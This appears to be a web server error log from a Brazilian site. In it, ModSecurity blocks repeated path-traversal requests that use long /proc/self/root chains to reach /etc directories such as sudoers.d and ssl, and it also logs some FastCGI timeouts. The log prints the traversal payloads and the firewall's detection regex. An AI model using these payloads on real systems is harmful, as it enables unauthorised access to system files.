[Wed Mar 18 21:12:06.063470 2026] [:error] [pid 30077:tid 140411565680384] [client 74.7.241.31:38324] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abs_Vvu8EFLIOrSqIptD3AAAAlU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 21:12:12.079283 2026] [:error] [pid 31803:tid 140411599251200] [client 74.7.241.31:55938] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abs_XOyqAr6etmhZHNoNBgAAAFE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 21:12:12.129935 2026] [proxy_fcgi:error] [pid 31803:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:45846] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 21:12:15.323351 2026] [:error] [pid 15051:tid 140411607643904] [client 74.7.243.128:54052] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abs_XymAPhZkrhU8w4mutQAAAJA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 21:12:27.549272 2026] [:error] [pid 31803:tid 140411548894976] [client 74.7.241.31:55944] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abs_a-yqAr6etmhZHNoNEwAAAFc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 21:12:30.261097 2026] [:error] [pid 15051:tid 140411607643904] [client 74.7.241.31:50670] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abs_bimAPhZkrhU8w4muvgAAAJA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 21:12:34.041888 2026] [proxy_fcgi:error] [pid 17887:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:46304] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 21:12:37.268133 2026] [:error] [pid 31803:tid 140411548894976] [client 74.7.241.31:50672] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abs_dOyqAr6etmhZHNoNGwAAAFc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 21:12:48.130528 2026] [:error] [pid 17887:tid 140411666392832] [client 74.7.241.31:39014] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abs_gAkwaGbbGflqUZBYlgAAAMk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 21:12:56.553822 2026] [proxy_fcgi:error] [pid 30077:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:46766] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 21:13:05.169156 2026] [:error] [pid 17653:tid 140411733534464] [client 74.7.241.31:47468] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abs_kcdf6f5d65gmYZQZ5AAAAsE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 21:13:09.840352 2026] [:error] [pid 31803:tid 140411599251200] [client 74.7.241.31:55756] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abs_leyqAr6etmhZHNoNMQAAAFE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 21:13:18.803158 2026] [:error] [pid 23798:tid 140411658000128] [client 74.7.241.31:55764] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abs_nj-9rzzdA3Ti0NCXtwAAAYo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 21:13:19.037948 2026] [proxy_fcgi:error] [pid 14269:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:47256] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 21:13:32.799165 2026] [:error] [pid 29882:tid 140411674785536] [client 74.7.241.31:58330] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abs_rEzinOy1jxa1j4djwAAAAQg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 21:13:38.944658 2026] [:error] [pid 17653:tid 140411733534464] [client 74.7.241.31:39158] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abs_ssdf6f5d65gmYZQaAgAAAsE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 21:13:41.057886 2026] [proxy_fcgi:error] [pid 9530:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:47794] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 21:13:45.693473 2026] [:error] [pid 17653:tid 140411557287680] [client 74.7.241.31:35822] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abs_ucdf6f5d65gmYZQaBwAAAtY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 21:13:46.884517 2026] [:error] [pid 29882:tid 140411674785536] [client 216.73.216.191:9683] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/etc/inputrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abs_ukzinOy1jxa1j4djyAAAAQg"]
[Wed Mar 18 21:13:47.754665 2026] [:error] [pid 23798:tid 140411658000128] [client 74.7.243.128:54160] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abs_uz-9rzzdA3Ti0NCXvwAAAYo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 21:13:48.440913 2026] [:error] [pid 29882:tid 140411674785536] [client 74.7.228.61:58144] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abs_vEzinOy1jxa1j4djyQAAAQg"]
[Wed Mar 18 21:13:50.308335 2026] [:error] [pid 9530:tid 140411649607424] [client 74.7.241.31:52030] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abs_vgSuyh5UNeevTVfp6gAAAws"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 21:14:03.105831 2026] [proxy_fcgi:error] [pid 15051:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:48288] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 21:14:13.866230 2026] [:error] [pid 17653:tid 140411557287680] [client 74.7.243.128:40282] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abs_1cdf6f5d65gmYZQaGAAAAtY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 21:14:25.125792 2026] [proxy_fcgi:error] [pid 27293:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:48758] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 21:14:47.129788 2026] [proxy_fcgi:error] [pid 30077:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:49216] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 21:14:52.944899 2026] [:error] [pid 14269:tid 140411674785536] [client 74.7.243.128:52808] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abs__AbLMZ6AikZjR9UELgAAAAg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 21:15:11.131884 2026] [proxy_fcgi:error] [pid 27293:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:49698] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 21:15:34.143608 2026] [:error] [pid 23798:tid 140411716749056] [client 74.7.243.128:59670] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abtAJj-9rzzdA3Ti0NCX5AAAAYM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 21:15:36.261974 2026] [proxy_fcgi:error] [pid 29882:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:50110] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 21:15:36.561844 2026] [:error] [pid 14269:tid 140411674785536] [client 74.7.243.128:50910] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abtAKAbLMZ6AikZjR9UEQAAAAAg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 21:16:02.112346 2026] [proxy_fcgi:error] [pid 29882:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:50562] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 21:16:26.650839 2026] [proxy_fcgi:error] [pid 27403:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:50880] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 21:16:48.178293 2026] [proxy_fcgi:error] [pid 15051:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:51412] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 21:17:11.505846 2026] [proxy_fcgi:error] [pid 15826:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:51880] AH01075: Error dispatching request to : (polling)
